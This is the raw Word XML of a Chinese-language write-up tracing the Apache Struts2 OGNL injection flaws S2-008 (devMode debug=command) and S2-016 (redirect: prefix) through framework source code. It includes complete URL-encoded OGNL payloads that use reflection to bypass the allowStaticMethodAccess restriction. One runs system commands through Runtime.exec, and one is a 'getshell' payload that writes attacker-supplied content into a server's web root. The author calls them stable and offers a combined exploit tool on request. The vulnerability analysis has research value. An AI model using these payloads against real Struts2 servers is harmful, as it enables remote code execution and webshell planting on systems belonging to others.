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ID</w:t>
      </w:r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:GENXOR</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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proofErr w:type="spellStart"/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weibo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:</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C71D71">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="069AEF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00C71D71">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="069AEF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>://weibo.com/u/2296090825</w:t>
        </w:r>
      </w:hyperlink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b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>看到网上关于struts2利用的文章非常多，但是对于漏洞触发跟踪分析的文档比较少，闲来无事跟踪了一下struts最近吵得比较火的两个漏洞，研究了一下能够稳定利用的payload。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b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>0×01 S2-008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首先说一下那个所谓的开发模式的struts2后门，这个漏洞源于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pwntesting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的一篇分析文章,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C71D71" w:rsidRPr="00C71D71" w:rsidRDefault="00131FD0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hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00C71D71" w:rsidRPr="00C71D71">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="069AEF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/</w:t>
        </w:r>
      </w:hyperlink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其实这个漏洞官方早就爆出了，编号S2-008,关于分析过程如下，其实真的没什么可说的，触发点实在太醒目了。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2框架存在一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vmod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模式，方便开发人员调试程序，但是默认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vmod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是不开启的，如果想要使用，需要手动修改参数，可以将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.propertie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中的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vmod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设置为true，或是在struts.xml中添加如下代码，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C71D71">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C71D71">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>constantname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C71D71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C71D71">
        <w:rPr>
          <w:rFonts w:ascii="Consolas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C71D71">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struts.devMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C71D71">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w: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C71D71">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71D71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C71D71">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w: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C71D71">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/&gt;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实际上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vmod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依赖于struts2底层的struts2-core.jar中的DebuggingInterceptor.java实现，然后也存在于此程序中。这里我以debug=command这个逻辑下，测试漏洞，我的POC如下所示：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http://localhost:8080/S2-016/hello.action?debug=command&amp;expression=%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23</w:t>
      </w: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>f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d@java.lang.Runtime@getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%23d%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29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首先，这里是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vmod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的几种模式，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</w:p>
    <w:p w:rsidR="00C71D71" w:rsidRPr="00C71D71" w:rsidRDefault="00D1593F" w:rsidP="00C71D71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647348"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="图片 13" descr="http://image98.360doc.com/DownloadImg/2016/07/0414/752844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98.360doc.com/DownloadImg/2016/07/0414/75284439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继续跟踪DebuggingInterceptor.java的代码，发现问题出在下面这个逻辑当中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C71D71" w:rsidRPr="00C71D71" w:rsidRDefault="00C87F8C" w:rsidP="00C87F8C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C569062" wp14:editId="5FEDE2A8">
            <wp:extent cx="5580380" cy="2946400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="图片 14" descr="http://image98.360doc.com/DownloadImg/2016/07/0414/7528443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98.360doc.com/DownloadImg/2016/07/0414/75284439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跟踪参数如图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C71D71" w:rsidRPr="00C71D71" w:rsidRDefault="00C87F8C" w:rsidP="00C87F8C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196783"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="图片 15" descr="http://image98.360doc.com/DownloadImg/2016/07/0414/7528443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98.360doc.com/DownloadImg/2016/07/0414/75284439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可以看到这里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 xml:space="preserve">String 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md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 xml:space="preserve"> =</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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getParameter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EXPRESSION_PARAM);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…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proofErr w:type="spellStart"/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writer.print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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C71D71">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>stack.findValue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C71D71">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C71D71">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C71D71">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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);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md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没做任何处理，后面直接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findValu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（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findValu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能够执行OGNL表达式，具体参考官方文档），导致OGNL表达式执行。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lastRenderedPageBreak/>
        <w:t>关于这个漏洞执行，其实没什么好说的，关键是这个payload是调用java反射类(可以访问一下私有成员变量)绕过了struts2限制执行java静态方法的规则，使之前apache官方的修复又白费了。因为struts2在2.3.14.1版本之后便设置#_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memberAcces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[“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llowStaticMethodAcces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”]为不可修改，而要调用java静态方法，必须要设置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llowStaticMethodAcces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为true才可以。这里使用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#f =#_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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memberAccess.getClass(</w:t>
      </w:r>
      <w:proofErr w:type="gram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).getDeclaredField(&amp;#039;allowStaticMethodAccess&amp;#039;)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#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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f.setAccessible</w:t>
      </w:r>
      <w:proofErr w:type="spell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(</w:t>
      </w:r>
      <w:proofErr w:type="gram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true)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#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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f.set</w:t>
      </w:r>
      <w:proofErr w:type="spell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(</w:t>
      </w:r>
      <w:proofErr w:type="gram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#_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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memberAccess,true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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)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使用java的反射机制绕过了限制。另外，还有利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java.lang.ProcessBuilder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类的start()方法来实现（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ProcessBuilder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类是用来创建系统进程的，每个实例管理一个进程属性集合，start方法用来创建一个新的进程实例，并且可以从相同的实例中反复多次的初始化、创建子进程。随便构造一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java.lang.ProcessBuilder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的实例，然后调用它的start()方法，便达到命令执行的目的），但这个算是另一种思路，并没有从根本上修改#_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memberAcces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[“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llowStaticMethodAcces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”]的值。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b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>0×02 S2-016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在struts2中，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faultActionMapper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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类支持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以"action:"、"redirect:"、"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edirectAction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:"作为导航或是重定向前缀，但是这些前缀后面同时可以跟OGNL表达式，由于struts2没有对这些前缀做过滤，导致利用OGNL表达式调用java静态方法执行任意系统命令。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以“redirect:”前缀举例，struts2会将“redirect:”前缀后面的内容设置到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edirect.location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当中，这里我们</w:t>
      </w:r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一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步步跟踪，首先是这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getMapping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函数跟入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580380" cy="3138287"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="图片 17" descr="http://image98.360doc.com/DownloadImg/2016/07/0414/7528443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98.360doc.com/DownloadImg/2016/07/0414/75284439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一直到这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handleSpecialParameters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)，继续跟入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3447962"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="图片 19" descr="http://image98.360doc.com/DownloadImg/2016/07/0414/7528443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98.360doc.com/DownloadImg/2016/07/0414/75284439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580380" cy="2851756"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="图片 20" descr="http://image98.360doc.com/DownloadImg/2016/07/0414/7528443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98.360doc.com/DownloadImg/2016/07/0414/75284439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真正传入OGNL表达式是在这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parameterAction.execut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)中，继续跟</w:t>
      </w:r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入来到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efaultActionMapper.java的代码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752925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="图片 21" descr="http://image98.360doc.com/DownloadImg/2016/07/0414/7528443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98.360doc.com/DownloadImg/2016/07/0414/75284439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key.substring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EDIRECT_PREFIX.length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))便是前缀后面的内容也就是OGNL表达式，struts2会调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etLocation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方法将他设置到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edirect.location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中。然后这里调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mapping.setResult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redirect)将redirect对象设置到mapping对象中的result里，如图所示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580380" cy="1458339"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="图片 22" descr="http://image98.360doc.com/DownloadImg/2016/07/0414/7528443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98.360doc.com/DownloadImg/2016/07/0414/75284439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5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然而上面的过程只是传递OGNL表达式，真正执行是在后面，这里是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FilterDispatcher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类中的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ispatcher.serviceAction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)方法，这里的mapping对象中设置了传入的OGNL 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645216"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="图片 23" descr="http://image98.360doc.com/DownloadImg/2016/07/0414/7528443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98.360doc.com/DownloadImg/2016/07/0414/75284439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跟</w:t>
      </w:r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入方法</w:t>
      </w:r>
      <w:proofErr w:type="gram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最终会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extParseUtil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个类的调用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ack.findValue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()方法执行OGNL。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C71D71" w:rsidRPr="00C71D71" w:rsidRDefault="008051E6" w:rsidP="008051E6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="150" w:line="390" w:lineRule="atLeas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256367"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="图片 24" descr="http://image98.360doc.com/DownloadImg/2016/07/0414/7528443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98.360doc.com/DownloadImg/2016/07/0414/75284439_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b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0×03 PAYLOAD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里我结合之前几个漏洞凑出一个通用payload，目前测试还是很稳定的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命令执行</w:t>
      </w:r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%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d@java.lang.Runtime@getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%23d%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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getshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00C71D71" w:rsidRPr="00C71D71" w:rsidRDefault="00C71D71" w:rsidP="00C71D71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C71D71">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="48484C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletRequest%22%29%2c%23b%3dnew+java.io.FileOutputStream%28new%20java.lang.StringBuilder%28%23a.getRealPath%28%22/%22%29%29.append%28@java.io.File@separator%29.append%28%23a.getParameter%28%22name%22%29%29.toString%28%29%29%2c%23b.write%28%23a.getParameter%28%22t%22%29.getBytes%28%29%29%2c%23b.close%28%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%22BINGO%22%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29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同时在之前的struts2exp这个程序基础上修改出一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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exp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，整合了近几年出现的几个高危漏洞,</w:t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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4815C0F7" wp14:editId="0598A90A">
            <wp:extent cx="5580380" cy="4431954"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://image.3001.net/images/20140209/13919237576854.jpg!small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3001.net/images/20140209/13919237576854.jpg!small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71" w:rsidRPr="00C71D71" w:rsidRDefault="00C71D71" w:rsidP="00C71D71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C71D71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程序没法直接放出，需要的联系我</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidRDefault="007A5775" w:rsidP="00E413A6"/>
    <w:sectPr w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidSect="00B07B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D0" w:rsidRDefault="00131FD0" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00131FD0" w:rsidRDefault="00131FD0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8051E6">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>8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8051E6">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>9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D0" w:rsidRDefault="00131FD0" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00131FD0" w:rsidRDefault="00131FD0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31F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131FD0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31F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5D8"/>
    <w:rsid w:val="00026BCE"/>
    <w:rsid w:val="00044C81"/>
    <w:rsid w:val="00067A2E"/>
    <w:rsid w:val="000A2612"/>
    <w:rsid w:val="000A57EB"/>
    <w:rsid w:val="000D26B6"/>
    <w:rsid w:val="001256E1"/>
    <w:rsid w:val="00131FD0"/>
    <w:rsid w:val="00132A14"/>
    <w:rsid w:val="001A657E"/>
    <w:rsid w:val="002105D8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051E6"/>
    <w:rsid w:val="00827EE3"/>
    <w:rsid w:val="00851504"/>
    <w:rsid w:val="008A1490"/>
    <w:rsid w:val="00927492"/>
    <w:rsid w:val="0096380B"/>
    <w:rsid w:val="009838FF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71D71"/>
    <w:rsid w:val="00C87F8C"/>
    <w:rsid w:val="00CB1951"/>
    <w:rsid w:val="00CC0917"/>
    <w:rsid w:val="00D030F1"/>
    <w:rsid w:val="00D1593F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8BBF037-200B-4C65-BF72-251F2D14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71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1D71"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00C71D7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71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1D71"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tag">
    <w:name w:val="tag"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00C71D71"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00C71D71"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="atv">
    <w:name w:val="atv"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00C71D71"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00C71D71"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="atn">
    <w:name w:val="atn"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00C7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u/2296090825?from=profile&amp;wvr=5&amp;loc=infdoma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mage.3001.net/images/20140209/13919237576854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wntester.com/blog/2014/01/21/struts-2-devmode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718E-01DE-4E7E-9E9D-1620FF8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7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-05T16:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-09T16:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>